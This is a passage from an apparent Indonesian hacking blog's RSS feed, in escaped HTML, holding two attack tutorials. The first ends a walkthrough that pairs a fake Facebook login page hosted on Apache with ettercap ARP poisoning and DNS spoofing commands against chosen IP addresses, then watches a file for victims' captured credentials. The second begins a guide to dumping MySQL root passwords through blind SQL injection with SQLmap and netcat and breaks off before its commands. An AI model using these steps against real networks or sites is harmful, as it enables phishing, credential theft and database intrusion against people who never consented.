red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ls -l&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--jUc4uQbt8c/T6oeBMv8KLI/AAAAAAAABas/FEevZzT7veo/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="142" src="http://3.bp.blogspot.com/--jUc4uQbt8c/T6oeBMv8KLI/AAAAAAAABas/FEevZzT7veo/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah file-file ini menjadi milik www-data. Maka selanjutnya kita akan menjalankan service apache, untuk menjalankan service apache, gunakan perintah:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;apache2ctl start&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;atau&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;b&gt;service apache2 start&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;atau&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;b&gt;/etc/ini.d/apache2 start&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;dan semua persiapanpun telah selesai.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;3. FMITM in action&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sebelum memulai FMITM, saya akan membuktikan keberhasilan MITM dalam melakukan redirect ke IP address saya. Ini adalah screenshoot sebelum FMITM dilakukan:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-cGWQcvcpcjY/T6oeemOxp-I/AAAAAAAABa0/iax6ZZRBzQw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://1.bp.blogspot.com/-cGWQcvcpcjY/T6oeemOxp-I/AAAAAAAABa0/iax6ZZRBzQw/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan command prompt. Perintah &lt;i&gt;ping www.google.com&lt;/i&gt; menunjukan adanya balasan dari google, IP address ini milik google, dan ini wajar pada jaringan yang belum terserang MITM attack.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian saya jalankan perintah MITM dengan menggunakan etercap.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ettercap -T -q -i vmnet8 -M ARP:REMOTE // // -P dns_spoof&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan kembali IP address anda, dan sesuaikan dengan perintah ettercap anda. Tanda // adalah target anda. // pertama menunjukan target 1, dan // kedua menunjukan target 2. Jika anda isi kosong, maka ettercap akan melancarkan serangan kepada semua IP address pada localhost, termasuk anda sendiri! Bagaimana jika anda hanya mengicar 1 orang?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;Target 1 = 192.168.1.1 &lt;b&gt;[Target 1 HARUS IP gate away]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Target 2 = 192.168.1.2&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka perintah ettercap&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2/ -P dns_spoof&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bagaimana jika target 2 berjumlah lebih dari 1?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;Target 1 = 192.168.1.1 &lt;b&gt;[Target 1 HARUS IP gate away]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Target 2 = 192.168.1.2 dan 192.168.1.3&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2,3/ -P dns_spoof&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dan ini adalah screenshoot ketika MITM terjadi&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-rNKt-QKBPt0/T6ogBsUnHvI/AAAAAAAABa8/wYCWF17mR2A/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://1.bp.blogspot.com/-rNKt-QKBPt0/T6ogBsUnHvI/AAAAAAAABa8/wYCWF17mR2A/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan kembali command prompt. Pada perintah &lt;i&gt;ping www.google.com&lt;/i&gt; yang ke dua, IP balasan bukanlah seperti IP address pada perintah ping pertama sebelum terjadinya MITM. IP balasan justru 10.10.2.1, dimana IP tersebut, adalah IP milik saya. Perhatikan juga URL pada Mozilla. URL menunjukan www.google.com, namun halaman berubah menjadi index localhost milik attacker. Monitoring selalu file hasil.txt dengan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;tail -f /var/www/hasil.txt&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika ada korban yang masuk, maka....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-dXKyvYRkF2g/T6ogpUG028I/AAAAAAAABbE/Oo-eTQEzKCs/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="142" src="http://3.bp.blogspot.com/-dXKyvYRkF2g/T6ogpUG028I/AAAAAAAABbE/Oo-eTQEzKCs/s320/9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You are so.....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Pwned by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-7709307254430705023?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/fmitm-hacking-account-facebook.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-jQKHfsasXeU/T6obxFblx-I/AAAAAAAABaU/7ITpol8kkFQ/s72-c/1.png' height='72' width='72'/><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-2747033293638184591</guid><pubDate>Tue, 08 May 2012 04:05:00 +0000</pubDate><atom:updated>2012-05-08T11:05:19.024+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>MySQL</category><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>SQLmap</category><title>Tricky Log In to MySQL</title><description>Ada banyak cara untuk melakukan Log In MySQL. Kebanyakan dilakukan dengan Web Shell yang memiliki fitur koneksi ke database MySQL sebuah web server. Setidaknya anda melakukan beberapa tahapan sebelum anda sampai ke database server.&lt;div&gt;&lt;ol&gt;&lt;li&gt;SQL Injection (Need Tools)&lt;/li&gt;&lt;li&gt;Log in site (Need Browser)&lt;/li&gt;&lt;li&gt;Upload Shell (Need Shell)&lt;/li&gt;&lt;li&gt;Find config.php or etc&lt;/li&gt;&lt;li&gt;Log In&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Namun saya hanya membutuhkan SQLmap dan netcat untuk menembak database server. Satu hal yang terpenting, anda harus menggunakan kecerdasan anda sendiri ketika menghadapi sebuah masalah dalam melakukan penetrasi test. Anda tidak bisa mengandalkan satu teori untuk menyelesaikan banyak masalah. Dalam hal ini, saya menemukan banyak kesulitan.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Port MySQL difilter, sehingga saya tidak bisa langsung mengkoneksikan mesin saya ke database server dengan IP address saya (mungkin pengaturan iptables yang membatasi saya)&lt;/li&gt;&lt;li&gt;Tidak ada config.php pada document root, sehingga saya harus melakukan blind SQLi untuk memperoleh root password mysql.&lt;/li&gt;&lt;li&gt;Tidak ada fitur upload pada situs ini, sehingga saya tidak dapat melakukan upload shell untuk melakukan koneksi mysql.&lt;/li&gt;&lt;/ol&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Xe2HtsZ-mgQ/T6iTkdh_niI/AAAAAAAABZM/qHKQ_F1wrDU/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="188" src="http://3.bp.blogspot.com/-Xe2HtsZ-mgQ/T6iTkdh_niI/AAAAAAAABZM/qHKQ_F1wrDU/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sadarilah, tidak ada yang mudah. Dan percayailah, bahwa yang sulit akan membawa anda pada teori baru yang membuat anda semakin berkualitas. ;)&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dalam turorial kali ini, saya masih menggunakan Virtual OS yang berjalan pada VMware dengan IP address 10.10.1.128. Tutorial ini masih berkaitan dengan&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/spawn-shell-with-sqlmap.html" target="_blank"&gt;Spawn Shell With SQLmap&lt;/a&gt;&amp;nbsp;dan&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/05/back-connect-with-sqlmap.html" target="_blank"&gt;Back Connect With SQLmap&lt;/a&gt;. Jika anda belum membaca kedua tutorial di atas, alangkah baiknya jika anda memahami kedua konsep diatas sebelum anda melakukan tahap ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;MySQL Connection&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Attacker (IP attacker) -&amp;gt; (Username + Password) -&amp;gt; MySQL port (3306)&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jika autentikasi valid, maka attacker dapat mengakses database web server. Autentikasi sendiri dapat dibatasi dengan pengaturan dari MySQL sendiri, atau melakukan filtrasi dari IP luar untuk memblokir paket yang masuk ke port 3306. Dan logikanya, TIDAK ADA web server yang menolak koneksi localhost untuk melakukan log in ke dalam database. Ini mengapa kebanyakan peretas menggunakan webshell untuk mengkoneksikan mesinnya ke dalam database web server.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Attacker -&amp;gt; Web Shell (IP Local) -&amp;gt; (Username + Password) -&amp;gt; MySQL port (3306)&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada kasus diatas, kemungkinan keberhasilan log in sangat tinggi, terlebih karena attacker menggunakan IP local milik web server, sehingga MySQL akan membaca paket login dengan IP 127.0.0.1. Paket ini tidak akan ditolak, karena berasal dari localhost. Dan permasalahannya adalah, mampukan attacker mendapatkan username + passwor? Tantangan yang sesungguhnya bukanlah mencari config.php, karena config.php hanya menyimpan username + password dari virtual user saja. Tantangan sesungguhnya justru datang dari, mampukah attacker mendapatkan root password MySQL?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;EULA (End User License Agreement)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="color: red;"&gt;Tutorial ini ditulis dengan tujuan edukasi, penyalahgunaan skill yang berasal dari tutorial ini, adalah tanggung jawab penulis.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Preparation :&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://sqlmap.sourceforge.net/" target="_blank"&gt;SQLmap&lt;/a&gt;&amp;nbsp;(dapat ditemukan di backtrack)&lt;/li&gt;&lt;li&gt;&lt;a href="http://netcat.sourceforge.net/" target="_blank"&gt;netcat&lt;/a&gt;&amp;nbsp;(dapat ditemukan di backtrack)&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;b&gt;Walkthrough :&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Dumping username + password root MySQL&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Untuk melakukan hal ini, saya menggunakan SQLmap 1.0 versi developer pada revisi 5029. Kita tau bahwa mesin 10.10.1.128 memiliki kelemahan terhadap penyerangan SQL Inection pada halaman checklogin.php pada parameter mypassword (baca tutorial&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-1.html" target="_blank"&gt;SQL Injection Level 4 Part 1&lt;/a&gt;). Setelah melalui tahap pengujian, ternyata kita mendapatkan database MySQL 5. Dan situs ini lemah terhadap penyerangan SQL Injection type&amp;nbsp;boolean-based blind, dan&amp;nbsp;AND/OR time-based blind. Karena ber-type blind, maka ini akan terasa seperti menunggu hujan emas. SQLmap akan berusaha mencari string yang tepat pada percobaan satu per satu dalam menemukan informasi yang diinginkan. Ini seperti meraba-raba kertas putih, menebaknya, kemudian jika tebakan anda benar maka karakter tebakan anda kan muncul. SQLmap akan menebak karakter per karakter. Ini adalah ciri khas dari SQL Injection type blind.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="background-color: #141414;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; 